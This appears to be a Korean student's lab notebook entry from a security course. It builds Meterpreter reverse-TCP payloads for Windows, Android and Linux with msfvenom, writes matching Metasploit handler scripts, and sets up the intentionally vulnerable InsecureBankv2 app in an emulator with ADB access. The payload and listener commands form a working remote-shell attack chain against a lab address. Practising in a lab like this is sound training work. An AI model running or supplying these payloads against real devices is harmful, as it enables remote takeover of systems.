#20250220

윈도우 / 안드로이드 / 리눅스용 악성코드 생성

윈도우 > msfvenom --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.209 LPORT=4444 -b "\x00" -f exe > /home/kali/win.exe
안드로이드 > msfvenom --platform android -p android/meterpreter/reverse_tcp LHOST=192.168.0.209 LPORT=4444 -o /home/kali/android.apk
리눅스 > msfvenom --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.0.209 LPORT=4444 -f elf > /home/kali/lin.elf

[malware_and.rc]
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.0.209
set lport 4444
exploit

[malware_lin.rc]
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.0.209
set lport 4444
exploit


안드로이드(nox)에 InsecureBank 설치
https://github.com/dineshshetty/Android-InsecureBankv2 > Code > Download ZIP

압축 푼 폴더의 InsecureBankv2.apk를 nox에 가져다 놓는다.

아나콘다 파워쉘 접속

가상환경 생성
> conda create -n py27 python=2.7

가상환경 진입
> conda activate py27

> cd C:\Users\PC9\AndroLabServer
> pip install -r requirements.txt
> python app.py

실행하면 8888 포트가 열린다.
이 후 폴더 안의 있는 db를 SQLlite로 열어서 로그인 정보를 확인한 뒤 안드로이드에서 로그인을 한다.

-----

ADB (Android Debug Bridge) 를 이용하여 안드로이드에 접속.

cmd
> cd C:\Users\PC9\adb
> adb connect 127.0.0.1:62001
> adb shell